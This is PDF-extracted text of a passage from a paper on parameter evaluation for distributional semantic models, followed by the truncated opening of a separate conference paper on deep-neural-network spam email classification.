fea- ture transformation. The best distance metric is cosine distance: this is one of the consistent findings of our evalua- tion study and it is in accordance with Bullinaria and Levy (2007) and, to a lesser extent, Kiela and Clark (2014).15 Score and transformation al- ways have a fundamental impact on model perfor- 15In Kiela and Clark (2014), cosine is reported to be the best similarity metric, together with the correlation similarity metric 536 ● ● ● ● ● ● ● 55 60 65 70 75 frequency tf.idf MI Dice simple−ll t−score z−score transformation ● none log root sigmoid Figure 2: TOEFL, score / transformation ● ● ● ● ● 55 60 65 70 75 1 2 4 8 16 transformation ● none log root sigmoid Figure 3: TOEFL, window size / transformation ● ● ● ● 55 60 65 70 75 100 300 500 700 900 metric ● cosine manhattan Figure 4: TOEFL, metric / n. of latent dim. ● ● ● 55 60 65 70 75 0 50 100 metric ● cosine manhattan Figure 5: TOEFL, metric / n. of skipped dim. mance: these parameters affect the distributional space independently of tasks and datasets. We will show that they are systematically involved in a strong interaction and that it is possible to iden- tify a score/transformation combination with robust performance across all tasks. The interaction be- tween score and transformation is displayed in fig- ure 2. The best results are achieved by association measures based on significance tests (simple-ll, t- score, z-score), followed by MI. This result is in line with previous studies (Bullinaria and Levy, 2012; Kiela and Clark, 2014), which found Pointwise MI or Positive MI to be the best feature scores. The best choice, simple-log likelihood, exhibits a strong vari- ation in performance across different transforma- tions. For all three significance measures, the best feature transformation is consistently a logarithmic transformation. Raw co-occurrence frequency, tf.idf and Dice only perform well in combination with a square root transformation. The best window size, as shown in figure 3, is a 2-word window for all evaluated transformations. (a mean-adjusted version of cosine similarity). The latter, how- ever, turned out to be more robust across different corpora and weighting schemes. The SVD parameters (number of latent dimen- sions and number of skipped dimensions) play a significant role in determining model performance. They are particularly important for the TOEFL task, but we will see that their explanatory power is also quite strong in the other tasks. Interestingly, they show a tendency to participate in interactions with other parameters, but do not interact among them- selves. We display the interaction between metric and number of latent dimensions in figure 4: the steep performance increase for both metrics shows that the widely-used choice of 300 latent dimen- sions (Landauer and Dumais, 1997) is suboptimal for the TOEFL task. The best value in our exper- iment is 900 latent dimensions, and additional di- mensions would probably lead to a further improve- ment. The interaction between metric and number of skipped dimensions is displayed in figure 5. While manhattan performs poorly no matter how many di- mensions are skipped, cosine is positively affected by skipping 100 and (to a lesser extent) 50 dimen- sions. The latter trend has already been discussed by Bullinaria and Levy (2012). Inspection of the remaining interaction plots, not shown here for reasons of space, reveals that the best 537 DSM performance in the TOEFL task is achieved by selecting ukwac as corpus and 10000 original di- mensions. The index of distributional relatedness has a very low explanatory power in the TOEFL task, with neighbor rank being the best choice (see plots 16 and 17 in section 5.4). Given the minimal explanatory power of the di- rection of the context window and the criterion for context selection in all three tasks, we will not fur- ther consider these parameters in our analysis. We recommend to set them to an “unmarked” option: undirected and frequency. The best setting identified by inspecting all effects is shown in table 5, together with its performance and with the performance of the (over-trained) best model in this task. Parameters of the latter are re- ported in appendix A. 5.2 Ratings Figure 6 displays the importance of the evaluated pa- rameters in the task of predicting similarity ratings. Parameters are ranked according to the average fea- ture ablation R2 values across both datasets (adj. R2 of the full linear model: RG65: 86%; WS353: 90%). ● ● ● ● ● ● ● ● ● ● ●criterion win.direction context.dim dim.skip win.size red.dim rel.index metric transformation corpus score 0 10 20 30 Partial R2 ● RG65 WS353 Figure 6: Ratings, parameters and feature ablation Table 3 reports all interactions that explain more than 0.5% of the total variance in both datasets. For reasons of space, we only discuss the interactions and best parameter values on RG65; the correspond- ing plots for WS353 are shown only if there are sub- stantial differences. As already noted for the TOEFL task, score and transformation have a large explanatory power and they are involved in a strong interaction showing the Interaction df RG65 WS353 score:transf 18 10.28 8.66 metric:red.dim 4 2.18 1.42 score:metric 6 1.91 0.59 win.size:transf 12 1.43 1.01 corpus:metric 2 1.83 0.51 metric:context.dim 4 1.08 0.62 corpus:score 12 0.77 0.82 win.size:score 24 0.77 0.69 score:dim.skip 12 0.58 0.85 Table 3: Ratings datasets: interactions, R2 same tendencies and optimal values already iden- tified for TOEFL. For reasons of space, we do not elaborate on this interaction here. The analysis of the main effects shows that for both datasets WaCkypedia is the best option as a source corpus, suggesting that this task bene- fits from a trade-off between quality and quan- tity (WaCkypedia being smaller and cleaner than ukWaC, but less balanced than the BNC). Index of distributional relatedness plays a much more important role than for the TOEFL task, with neighbor rank clearly outperforming distance (see figures 16 and 17 and the discussion in section 5.4 for more details). The choice of the optimal window size depends on transformation: on the RG65 dataset, figure 7 shows that for a logarithmic transformation – which we al- ready identified as the best transformation in combi- nation with significance association measures – the highest performance is achieved with a 4 word win- dow. The corresponding effect display for WS353 (figure 8) suggests that a further small improvement may be obtained with an 8 word window in this case. One possible explanation for this observation is the different composition of the WS353 dataset, which includes examples of semantic relatedness beyond attributional similarity. The 4 word window is a ro- bust choice across both datasets, though. The number of latent dimensions is involved in a strong interaction with the distance metric (figure 9). Best results are achieved with the cosine met- ric and at least 300 latent dimensions, as well as 50 skipped dimensions. The interaction plot between metric and number of original dimensions in figure 10 shows that 50000 context dimensions are suffi- cient for good performance, and no further improve- ment can be expected from even higher-dimensional spaces. 538 ● ● ● ● ● 0.45 0.50 0.55 0.60 0.65 0.70 0.75 1 2 4 8 16 transformation ● none log root sigmoid Figure 7: RG65, window size / transformation ● ● ● ● ● 0.25 0.30 0.35 0.40 0.45 0.50 0.55 1 2 4 8 16 transformation ● none log root sigmoid Figure 8: WS353, window size / transformation ● ● ● ● ● 0.45 0.50 0.55 0.60 0.65 0.70 0.75 100 300 500 700 900 metric ● cosine manhattan Figure 9: RG65, metric / n. latent dim. ● ● ● ● ● 0.45 0.50 0.55 0.60 0.65 0.70 0.75 5000 10000 20000 50000 100000 metric ● cosine manhattan Figure 10: RG65, metric / n. context dimensions Best settings for both datasets are summarized in table 5. Refer to appendix A for best models. 5.3 Clustering Figure 11 displays the importance of the evaluated parameters in the clustering task (adj. R2 of the full linear model: AP: 82%; BATTIG: 77%; ESSLLI: 58%; MITCHELL: 73%). Parameter ranking is de- termined by the average of the feature ablation R2 values over all four datasets. ● ● ● ● ● ● ● ● ● ● ●criterion win.direction rel.index context.dim dim.skip red.dim win.size metric corpus transformation score 0 10 20 30 Partial R2 ● AP BATTIG ESSLLI MITCHELL Figure 11: Clustering, parameters and feat. ablation Interaction df AP BATTIG ESSLLI MITCHELL score:transf 18 7.10 7.95 7.56 11.42 metric:red.dim 4 3.29 3.16 2.03 2.03 win.size:metric 4 2.22 1.26 2.97 2.72 win.size:transf 12 2.00 2.95 0.88 2.66 corpus:metric 2 1.42 2.91 2.79 1.11 metric:dim.skip 2 2.25 1.54 2.77 0.86 corpus:win.size 8 2.36 1.18 1.49 1.23 score:dim.skip 12 0.56 1.15 0.99 1.39 win.size:score 24 0.74 0.77 0.54 0.65 Table 4: Clustering task: interactions, R2 Table 4 reports all parameter interactions that ex- plain more than 0.5% of the total variance for each of the four datasets. In the following discussion, we focus on the AP dataset, which is larger and thus more reliable than the other three datasets. We mention remarkable dif- ferences between the datasets in terms of best pa- rameter values. For a full overview of the best pa- rameter setting for each dataset, see table 5. As already discussed for TOEFL and the ratings task, we find score and transformation at the top of the feature ablation ranking. Table 4 confirms that the two parameters are involved in a strong inter- action. The interaction plot (figure 12) shows the behavior we are already familiar with: significance 539 ● ● ● ● ● ● ● 0.45 0.50 0.55 0.60 frequency tf.idf MI Dice simple−ll t−score z−score transformation ● none log root sigmoid Figure 12: AP, score / transformation ● ● ● ● ● 0.45 0.50 0.55 0.60 1 2 4 8 16 metric ● cosine manhattan Figure 13: AP, window size / metric ● ● ● ● ● 0.45 0.50 0.55 0.60 1 2 4 8 16 corpus ● bnc wacky ukwac Figure 14: AP, corpus / window size ● ● ● 0.45 0.50 0.55 0.60 0 50 100 metric ● cosine manhattan Figure 15: AP, metric / n. of skipped dim. measures (simple-ll, t-score and z-score) reach the best performance in combination with log transfor- mation: this combination is a robust choice also for the other datasets, with minor differences that can be observed in table 5 . The interaction between window size and metric is displayed in figure 13: best performance is achieved with a 2 or 4 word window in combination with co- sine distance. Results on the other datasets suggest a preference for the 4 word window. This is confirmed by interaction plots with source corpus (figure 14), which also reveal that WaCkypedia is again the best compromise between size and quality. A very clear picture concerning the number of skipped dimensions emerges from figure 15 and is the same for all datasets: skipping dimensions is not necessary to achieve good performance (even though skipping 50 dimensions turned out at least to be not detrimental for BATTIG and MITCHELL). Further effect displays, not shown here for rea- sons of space, suggest that 300 or 500 latent dimen- sions – with some variation across the datasets (cf. table 5) – and a medium-sized co-occurrence matrix (20000 or 50000 dimensions) are needed to achieve good performance. Neighbor rank is the best choice as index of distributional relatedness (see section 5.4). See appendix A for best models. 5.4 Relatedness index A novel contribution of our work is the systematic evaluation of a parameter that has received little at- tention in DSM research so far, and only in studies limited to a narrow choice of datasets (Lapesa and Evert, 2013; Lapesa et al., 2014; Zeller et al., 2014): the index of distributional relatedness. The aim of this section is to provide a full overview of the impact of this parameter in our ex- periments. Despite the main focus of the paper on the reduced setting, in this section we also show re- sults from the unreduced setting, for two reasons: first, since this parameter is relatively novel and evaluated here for the first time on standard tasks, we consider it necessary to provide a full picture concerning its behavior; second, relatedness index turned out to be much more influential in the unre- duced setting than in the reduced one. Figure 16 and 17 display the partial effect of relat- edness index for each dataset, in the unreduced and reduced setting respectively. To allow for a com- parison between the different measures of perfor- 540 ● ●● ● ● ● ● 30 40 50 60 70 80 TOEFL RG65 WS353 AP BATTIG MITCHELL ESSLLI rel.index ● dist rank Figure 16: Unreduced Setting ● ● ● ● ● ● ● 30 40 50 60 70 80 TOEFL RG65 WS353 AP BATTIG MITCHELL ESSLLI rel.index ● dist rank Figure 17: Reduced Setting mance, correlation and purity values have been con- verted to percentages. The picture emerging from the two plots is very clear: neighbor rank is the best choice for both settings across all seven datasets. The degree of improvement over vector distance, however, shows considerable variation between dif- ferent datasets. The rating task benefits the most from the use of neighbor rank. On the other hand, neighbor rank has very lit- tle effect for the TOEFL task in a reduced setting, where its high computational complexity is clearly not justified; the improvement on the AP clustering dataset is also fairly small. While the TOEFL result seems to contradict the substantial improvement of neighbor rank found by Lapesa and Evert (2013) for a multiple-choice task based on stimuli from prim- ing experiments, there were only two choices (con- sistent and inconsistent prime) in this case rather than four. We do not rule out that a more refined use of the rank information (for example, different strategies for rank combinations) may produce bet- ter results on the TOEFL and AP datasets. As discussed in section 3.2, we have not yet ex- plored the potential of neighbor rank in modeling directionality effects in semantic similarity. Unlike Lapesa and Evert (2013), who adopt four differ- ent indexes of distributional relatedness (vector dis- tance; forward rank, i.e., rank of the target in the neighbors of the prime; backward rank, i.e, rank of the prime in the neighbors of the target; average of backward and forward rank), we used only a single rank-based index (cf. section 3.2), mostly for rea- sons of computational complexity. We consider the results of this study more than encouraging, and ex- pect further improvements from a full exploration of directionality effects in the tasks at issue. 5.5 Best settings We conclude the result overview by evaluating the best parameter combinations identified for each task and data set, showing how well our approach to model selection works in practice. Table 5 summarizes the optimal parameter set- tings identified for each task and compares the per- formance of this model (B.set = best setting) with the over-trained best run in the experiment (B.run = best run).16 In most cases, the result of our ro- bust parameter optimization is close to the best run. The only exception is the ESSLLI dataset, which is smaller than the other datasets and particularly sus- ceptible to over-training (cf. the low R2 of the re- gression analysis in section 5.3). Table 5 also re- ports the current state of the art for each task (SoA = state-of-the-art), taken from the ACL wiki17 where available (TOEFL and similarity ratings), from Ba- roni and Lenci (2010) for the clustering tasks, and from more recent studies of which we are aware. Our results are comparable to the state of the art, even though the latter includes a much broader range of approaches than our window-based DSMs. In one case (BATTIG), our optimized model even improves on the best previous result. A side-by-side inspection of the main effects and interaction plots for different data sets allowed us to identify parameter settings that are robust across datasets and even across tasks. Table 6 shows rec- ommended settings for each task (independent of the 16Abbreviations in the table: win = window size; c.dim = number of context dimensions; tr = transformation; red.dim = number of latent dimensions; d.sk= number of skipped dimen- sions; r.ind = relatedness index; Parameter values: s-ll = simple- ll; t-sc = t-score; cos = cosine; man = manhattan. 17http://aclweb.org/aclwiki 541 Dataset corpus win c.dim score tr metric r.ind red.dim d.sk B.set B.run SoA Reference TOEFL ukwac 2 10k s-ll log cos rank 900 100 92.5 98.7 100.0 Bullinaria and Levy (2012) RG65 wacky 4 50k s-ll log cos rank 500 50 0.87 0.89 0.86 Hassan and Mihalcea (2011)18 WS353 wacky 8 50k s-ll log cos rank 300 50 0.68 0.73 0.81 Halawi et al. (2012)19 AP wacky 4 20k s-ll log cos rank 300 0 0.69 0.76 0.79 Rotenhäusler and Schütze (2009) BATTIG wacky 8 50k s-ll log cos rank 500 0 0.98 0.99 0.96 Baroni and Lenci (2010) ESSLLI wacky 2 20k t-sc log cos rank 300 0 0.77 0.98 0.91 Katrenko, ESSLLI workshop20 MITCHELL wacky 4 50k s-ll log cos rank 500 0 0.88 0.97 0.94 Bullinaria and Levy (2012) common for all datasets: window direction = undirected; criterion for context selection = frequency Table 5: Best Settings particular dataset) and a more general setting that achieves good performance in all three tasks. Eval- uation results for these settings on each dataset are reported in table 7. In most cases, the general model is close to the performance of the task- and dataset- specific settings. Our robust evaluation methodol- ogy has enabled us to find a good trade-off between portability and performance. Task corpus win c.dim score tr metric r.ind red.dim d.sk TOEFL ukwac 2 10k s-ll log cos rank 900 100 Rating wacky 4 50k s-ll log cos rank 300 50 Clustering wacky 4 50k s-ll log cos rank 500 0 General wacky 4 50k s-ll log cos rank 500 50 Table 6: General Best Settings Dataset TOEFL RATINGS CLUSTERING GENERAL TOEFL 92.5 85.0 75.0 90.0 RG65 0.84 0.86 0.84 0.87 WS353 0.62 0.67 0.64 0.68 AP 0.62 0.66 0.67 0.67 BATTIG 0.87 0.91 0.98 0.90 ESSLLI 0.66 0.77 0.80 0.77 MITCHELL 0.75 0.83 0.88 0.83 Table 7: General best Settings – Performance 6 Conclusion In this paper, we reported the results of a large-scale evaluation of window-based Distributional Semantic Models, involving a wide range of parameters and tasks. Our model selection methodology is robust to overfitting and sensitive to parameter interactions. 18The ACL wiki lists the hybrid model of Yih and Qazvinian (2012) as the best model on RG65 with ρ = 0.89, but does not specify its Pearson correlation r. In our comparison table, we show the best Pearson correlation, achieved by Hassan and Mi- halcea (2011), which is also the best corpus-based model. 19Halawi et al. (2012) report Spearman’s ρ . The ρ values for our best setting are: RG65: 0.85, WS353: 0.70; best setting for the ratings task: RG65: 0.82, WS353: 0.67; best general setting: RG65: 0.87, WS353: 0.70. 20http://wordspace.collocations.de/ It allowed us to identify parameter configurations that perform well across different datasets within the same task, and even across different tasks. We rec- ommend the setting highlighted in bold font in table 5 as a general-purpose DSM for future research. We believe that many applications of DSMs (e.g. vector compositon) will benefit from using such a param- eter combination that achieves robust performance in a variety of semantic tasks. Moreover, an exten- sive evaluation based on a robust methodology like the one presented here is the first necessary step for further comparisons of bag-of-words DSMs to dif- ferent techniques for modeling word meaning, such as neural embeddings (Mikolov et al., 2013). Let us now summarize our main findings. • Our experiments show that a cluster of three pa- rameters, namely score, transformation and dis- tance metric, plays a consistently crucial role in determining DSM performance. These param- eters also show a homogeneous behavior across tasks and datasets with respect to best parameter values: simple-ll, log transformation and cosine distance. These tendencies confirm the results in Polajnar and Clark (2014) and Kiela and Clark (2014). In particular, the finding that sparse as- sociation measures (with negative values clamped to zero) achieve the best performance can be con- nected to the positive impact of context selection highlighted by Polajnar and Clark (2014): ongo- ing work targets a more specific analysis of their “thinning” effect on distributional vectors. • Another group of parameters (corpus, window size, dimensionality reduction parameters) is also influential in all tasks, but shows more variation wrt. the best parameter values. Except for the TOEFL task, best results are obtained with the WaCkypedia corpus, confirming the observation of Sridharan and Murphy (2012) that corpus qual- 542 ity compensates for size to some extent. Window size and dimensionality reduction show a more task-specific behavior, even though it is possible to find a good compromise in a 4 word window, a reduced space of 500 dimensions and skipping of the first 50 dimensions. The latter result confirms the findings of Bullinaria and Levy (2007; 2012) in their clustering experiments. • The number of context dimensions turned out to be less crucial. While very high-dimensional spaces usually result in better performance, the increase beyond 20000 or 50000 dimensions is rarely suf- ficient to justify the increased processing cost. • A novel contribution of our work is the systematic evaluation of a parameter that has been given lit- tle attention in DSM research so far: the index of distributional relatedness. Our results show that, even if the parameter is not among the most in- fluential ones, neighbor rank consistently outper- forms distance. Without SVD dimensionality re- duction, the difference is more pronounced: this result is particularly interesting for composition- ality tasks, where SVD has been reported to be detrimental (Baroni and Zamparelli, 2010). In such cases, the benefits of using neighbor rank clearly outweigh the increased (but manageable) computational complexity. Ongoing work focuses on the extension of the eval- uation setting to further parameters (e.g., new dis- tance metrics and association scores, Caron’s (2001) exponent p) and tasks (e.g., compositionality tasks, meaning in context), as well as the evaluation of dependency-based models. We are also working on a refined model selection methodology involv- ing a systematic analysis of three-way interactions and the exclusion of inferior parameter values (such as Manhattan distance, sigmoid transformation and Dice score), which may have a confounding effect on some of the effect displays. Appendix A: Best models This appendix reports the best runs for every dataset.21 21Some abbreviations are different from tables 5 and 6. Pa- rameters: w = window; dir = direction; e = exclusion criterion for context selection; m = metric. Performance: acc = accu- racy; cor = correlation; pur = purity. Parameter values: dir = directed; undir = undirected; f = frequency; nz = non-zero. corpus w dir e c.dim score tr m r.ind red.dim d.sk acc ukwac 2 undir f 5000 MI none cos rank 900 100 98.75 ukwac 4 dir f 50000 t-score log cos rank 900 100 98.75 ukwac 4 undir f 50000 t-score root cos dist 900 100 98.75 ukwac 4 dir f 5000 simple-ll log cos dist 900 100 98.75 Table 8: TOEFL dataset – 23 models tied for best result (4 hand-picked examples shown) corpus w dir e c.dim score tr m r.ind red.dim d.sk cor ukwac 16 undir nz 20000 MI none cos rank 700 100 0.89 ukwac 8 dir f 20000 MI none cos rank 700 100 0.89 wacky 4 dir nz 50000 simple-ll log cos rank 700 50 0.89 wacky 4 undir f 100000 z-score log cos rank 900 50 0.89 Table 9: Ratings, RG65 dataset – 19 models tied for best result (4 hand-picked examples shown) corpus w dir e c.dim score tr m r.ind red.dim d.sk cor wacky 16 dir f 5000 MI none man rank 900 50 0.73 wacky 16 undir f 5000 MI none man rank 900 50 0.72 wacky 16 undir f 5000 z-score log man rank 900 50 0.72 wacky 16 dir f 10000 z-score root man rank 900 50 0.72 Table 10: Ratings, WordSim353 dataset – best model (3 additional hand-picked models with sim- ilar performance are shown) corpus w dir e c.dim score tr m r.ind red.dim d.sk pur ukwac 4 dir nz 10000 t-score log man rank 900 50 0.76 wacky 1 dir nz 10000 z-score log man rank 900 50 0.75 wacky 1 undir f 20000 simple-ll log man rank 900 50 0.75 wacky 2 dir f 100000 z-score log cos rank 500 0 0.75 Table 11: Clustering, Almuhareb-Poesio dataset – best model (plus 3 additional hand-picked models) corpus w dir e c.dim score tr m r.ind red.dim d.sk pur ukwac 1 undir f 20000 Dice root man rank 300 100 0.99 ukwac 2 undir f 100000 freq log cos dist 300 50 0.99 wacky 16 undir f 50000 z-score log man dist 500 50 0.99 wacky 8 undir f 10000 Dice root man rank 500 0 0.99 Table 12: Clustering, Battig dataset – 1037 models tied for best result (4 hand-picked examples shown) corpus w dir e c.dim score tr m r.ind red.dim d.sk pur wacky 16 dir nz 50000 z-score none man dist 900 0 0.98 ukwac 1 dir nz 100000 simple-ll log cos dist 100 50 0.95 ukwac 2 undir f 50000 tf.idf none man dist 700 0 0.95 wacky 8 undir f 100000 tf.idf root man rank 500 0 0.95 Table 13: Clustering, ESSLLI dataset – best model (plus 3 additional hand-picked models) corpus w dir e c.dim score tr m r.ind red.dim d.sk pur bnc 2 undir nz 100000 simple-ll log cos rank 900 0 0.97 bnc 2 undir f 50000 simple-ll log cos rank 700 0 0.97 bnc 2 undir nz 50000 simple-ll log cos rank 900 0 0.97 Table 14: Clustering, Mitchell dataset – 3 models tied for best result 543 Acknowledgments We are grateful to the editor and the anonymous re- viewers, whose comments helped us improve the paper. We would like to thank Sabine Schulte im Walde and the SemRel group at the IMS Stuttgart, the Corpus Linguistics group at the University of Erlangen-Nürnberg and the Computational Linguis- tics group at the IKW Osnabrück for their feedback on our work. Gabriella Lapesa’s PhD research was funded by the DFG Collaborative Research Centre SFB 732 at IMS Stuttgart, where she conducted a large part of the work presented in this paper. References Abdulrahman Almuhareb. 2006. Attributes in Lexical Acquisition. Ph.D. thesis, University of Essex. Marco Baroni and Alessandro Lenci. 2010. Distribu- tional memory: A general framework for corpus-based semantics. Computational Linguistics, 36(4):1–49. Marco Baroni and Roberto Zamparelli. 2010. Nouns are vectors, adjectives are matrices: Representing adjective-noun constructions in semantic space. In Proceedings of the 2010 Conference on Empiri- cal Methods in Natural Language Processing, pages 1183–1193, MIT, Massachusetts, USA. Marco Baroni, Raffaella Bernardi, and Roberto Zampar- elli. 2014. Frege in space: A program for compo- sitional distributional semantics. Linguistic Issues in Language Technology (LiLT), 9(6):5–109. John A. Bullinaria and Joseph P. Levy. 2007. Extract- ing semantic representations from word co-occurrence statistics: A computational study. Behavior Research Methods, 39:510–526. John A. Bullinaria and Joseph P. Levy. 2012. Extract- ing semantic representations from word co-occurrence statistics: stop-lists, stemming and SVD. Behavior Research Methods, 44:890–907. John A. Bullinaria and Joseph P. Levy. 2013. Limiting factors for mapping corpus-based semantic represen- tations to brain activity. PLoS ONE, 8(3):1–12. John Caron. 2001. Experiments with LSA scoring: Optimal rank and basis. In Michael W. Berry, edi- tor, Computational Information Retrieval, pages 157– 169. Society for Industrial and Applied Mathematics, Philadelphia, PA, USA. Stefan Evert. 2008. Corpora and collocations. In Anke Lüdeling and Merja Kytö, editors, Corpus Linguistics. An International Handbook, chapter 58. Mouton de Gruyter, Berlin, New York. Stefan Evert. 2014. Distributional semantics in R with the wordspace package. In Proceedings of COLING 2014, the 25th International Conference on Compu- tational Linguistics: System Demonstrations, pages 110–114, Dublin, Ireland. Lev Finkelstein, Evgeniy Gabrilovich, Yossi Matias, Ehud Rivlin, Zach Solan, Gadi Wolfman, and Eytan Ruppin. 2002. Placing search in context: The concept revisited. ACM Transactions on Information Systems, 20(1):116–131. John Fox. 2003. Effect displays in R for generalised lin- ear models. Journal of Statistical Software, 8(15):1– 27. Guy Halawi, Gideon Dror, Evgeniy Gabrilovich, and Yehuda Koren. 2012. Large-scale learning of word re- latedness with constraints. In Proceedings of the 18th ACM SIGKDD international conference on Knowl- edge discovery and data mining, pages 1406–1414, New York, NY, USA. Nathan Halko, Per-Gunnar Martinsson, and Joel A. Tropp. 2009. Finding structure with randomness: Stochastic algorithms for constructing approximate matrix decompositions. Technical Report 2009-05, ACM, California Institute of Technology. Mary Hare, Michael Jones, Caroline Thomson, Sarah Kelly, and Ken McRae. 2009. Activating event knowl- edge. Cognition, 111(2):151–167. Zelig Harris. 1954. Distributional structure. Word, 10(23):146–162. Samer Hassan and Rada Mihalcea. 2011. Semantic relat- edness using salient semantic analysis. In Proceedings of the Twenty-fifth AAAI Conference on Artificial Intel- ligence, pages 884 – 889, San Francisco, California. George Karypis. 2003. CLUTO: A clustering toolkit (release 2.1.1). Technical Report 02-017, Minneapo- lis: University of Minnesota, Department of Computer Science. Leonard Kaufman and Peter J. Rousseeuw. 1990. Find- ing groups in data: an introduction to cluster analysis. John Wiley and Sons. Douwe Kiela and Stephen Clark. 2014. A systematic study of semantic vector space model parameters. In Proceedings of EACL 2014, Workshop on Continu- ous Vector Space Models and their Compositionality (CVSC), pages 21–30, Gothenburg, Sweden. Thomas K. Landauer and Susan T. Dumais. 1997. A so- lution to Plato’s problem: The latent semantic analysis theory of the acquisition, induction, and representation of knowledge. Psychological Review, 104:211–240. Gabriella Lapesa and Stefan Evert. 2013. Evaluating neighbor rank and distance measures as predictors of semantic priming. In Proceedings of the ACL Work- shop on Cognitive Modeling and Computational Lin- guistics (CMCL 2013), pages 66–74, Sofia, Bulgaria. 544 Gabriella Lapesa, Stefan Evert, and Sabine Schulte im Walde. 2014. Contrasting syntagmatic and paradig- matic relations: Insights from distributional semantic models. In Proceedings of the Third Joint Confer- ence on Lexical and Computational Semantics (*SEM 2014), pages 160–170, Dublin, Ireland. Dekang Lin. 1998. Automatic retrieval and clustering of similar words. In Proceedings of the 36th Annual Meeting of the Association for Computational Linguis- tics and 17th International Conference on Computa- tional Linguistics - Volume 2, pages 768–774, Mon- treal, Quebec, Canada. Kevin Lund and Curt Burgess. 1996. Producing high-dimensional semantic spaces from lexical co- occurrence. Behavior Research Methods, Instrumen- tation and Computers, 28:203–208. Tomas Mikolov, Kai Chen, Greg Corrado, and Jeffrey Dean. 2013. Efficient estimation of word represen- tations in vector space. CoRR. Jeff Mitchell and Mirella Lapata. 2008. Vector-based models of semantic composition. In Proceedings of ACL-08: HLT, pages 236–244, Columbus, Ohio. Tom Mitchell, Svetlana V. Shinkareva, Andrew Carlson, Kai-Min Chang, Vicente L. Malave, Robert A. Mason, and Marcel Adam Just. 2008. Predicting human brain activity associated with the meanings of nouns. Sci- ence, 320(5880):1191–1195. Brian Murphy, Partha Talukdar, and Tom Mitchell. 2012. Selecting corpus-semantic models for neurolinguistic decoding. In Proceedings of the First Joint Conference on Lexical and Computational Semantics - SemEval ’12, pages 114–123. Sebastian Padó and Mirella Lapata. 2007. Dependency- based construction of semantic space models. Compu- tational Linguistics, 33(2):161–199. Tamara Polajnar and Stephen Clark. 2014. Improving distributional semantic vectors through context selec- tion and normalisation. In Proceedings of the 14th Conference of the European Chapter of the Asso- ciation for Computational Linguistics (EACL 2014), pages 230–238, Gothenburg, Sweden. Klaus Rothenhäusler and Hinrich Schütze. 2009. Un- supervised classification with dependency based word spaces. In Proceedings of the EACL 2009 Workshop on GEMS: GEometical Models of Natural Language Semantics, pages 17–24, Athens, Greece. Herbert Rubenstein and John B. Goodenough. 1965. Contextual correlates of synonymy. Communications of the ACM, 8(10):627—633. Magnus Sahlgren. 2006. The Word-Space Model: Us- ing distributional analysis to represent syntagmatic and paradigmatic relations between words in high- dimensional vector spaces. Ph.D. thesis, University of Stockolm. Gerard Salton, Andrew Wong, and ChungShu Yang. 1975. A vector space model for automatic indexing. Communications of the ACM, 18(11):613–620. Hinrich Schütze. 1998. Automatic word sense discrimi- nation. Computational Linguistics, 27(1):97–123. Seshadri Sridharan and Brian Murphy. 2012. Model- ing word meaning: Distributional semantics and the corpus quality-quantity trade-off. In Proceedings of the 3rd workshop on Cognitive Aspects of the Lexicon (CogAlex-III), pages 53–68, Mumbai, India. Peter D. Turney and Patrick Pantel. 2010. From fre- quency to meaning: Vector space models of semantics. Journal of Artificial Intelligence Research, 37:141– 188. James Van Overschelde, Katherine Rawson, and John Dunlosky. 2004. Category norms: An updated and expanded version of the Battig and Montague (1969) norms. Journal of Memory and Language, 50:289– 335. Wen-tau Yih and Vahed Qazvinian. 2012. Measur- ing word relatedness using heterogeneous vector space models. In Proceedings of the 2012 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Tech- nologies (NAACL HLT ’12), pages 616–620, Montreal, Canada. Britta Zeller, Sebastian Padó, and Jan Šnajder. 2014. To- wards semantic validation of a derivational lexicon. In Proceedings of COLING 2014, the 25th International Conference on Computational Linguistics: Technical Papers, pages 1728–1739, Dublin, Ireland. 545 546 work_5dzi3skd2ngnbczs2uwyz7x3se ---- 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 17 Research of Email Classification based on Deep Neural Network Wang Yawen School of Computer Science and Engineering Xi’an Technological University Xi’an, 710021, China e-mail: 475609323@qq.com Yu Fan a , Wei Yanxi b School of Computer Science and Engineering Xi’an Technological University Xi’an, 710021, China e-mail: a 409066272@qq.com b 407171251@qq.com Abstract—The effective distinction between normal email and spam, so as to maximize the possible of filtering spam has become a research hotspot currently. Naive bayes algorithm is a kind of frequently-used email classification and it is a statistical-based classification algorithm. It assumes that the attributes are independent of each other when given the target value. This hypothesis is apparently impossible in the email classification, so the accuracy of email classification based on naive bayes algorithm is low. In allusion to the problem of poor accuracy of email classification based on naive bayes algorithm, scholars have proposed some new email classification algorithms. The email classification algorithm based on deep neural network is one kind of them. The deep neural network is an artificial neural network with full connection between layer and layer. The algorithm extracted the email feature from the training email samples and constructed a DNN with multiple hidden layers, the DNN classifier was generated by training samples, and finally the testing emails were classified, and they were marked whether they were spam or not. In order to verify the effect of the email classification algorithm based on DNN, in this paper we constructed a DNN with 2 hidden layers. The number of nodes in each hidden layer was 30. When the training set was trained, we set up 2000 batches, and each batch has 3 trained data. We used the famous Spam Base dataset as the data set. The experiment result showed that DNN was higher than naive Bayes in the accuracy of email classification when the proportion of the training set was 10%, 20%, 30%, 40% and 50% respectively, and DNN showed a good classification effect. With the development of science and technology, spam manifests in many forms and the damage of it is more serious, this puts forward higher requirements for the accuracy of spam recognition. The focus of next research will be combining various algorithms to further improve the effect of email classification. Keywords-Deep Neural Networks; Spam Email; Classification; Naive Bayes; SpamBase Data Set I. INTRODUCTION Email has become a major way of communication for people at present, but the problem of spam comes behind. The harm of spam is mainly manifested as the following aspects: occupying bandwidth, leading to the congestion of the email server and reducing the efficiency of the network; consuming the time of the user and affecting the work efficiency. Therefore, the effective distinction between normal email and spam, so as to maximize the possible of filtering spam has become a research hotspot currently. Naive bayes algorithm is a kind of frequently-used email classification and it is a statistical-based classification algorithm[1-3], which has the characteristics of simple realization and fast classification. However, it assumes that the attributes are independent of each other when given the target value[4].This hypothesis is apparently impossible in the email classification, so the accuracy of email classification based on naive bayes algorithm is low. In allusion to the problem of poor accuracy of email classification based on naive bayes algorithm, scholars have proposed some new email classification algorithms. The mailto:407171251@qq.com file:///D:/ProgramData/Youdao/Dict/7.5.2.0/resultui/dict/ file:///D:/ProgramData/Youdao/Dict/7.5.2.0/resultui/dict/ 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 18 email classification algorithm based on deep neural network (DNN) is one kind of them. II. THEORETICAL BASIS The basic concept of artificial neural network is based on the hypothesis and model construction of how the human brain responds to complex problems[4-6]. The deep neural network is an artificial neural network with full connection between layer and layer, and its structure is shown in figure 1.The full connection between layer and layer means that any neuron in the layer must be connected to any of the neurons in the 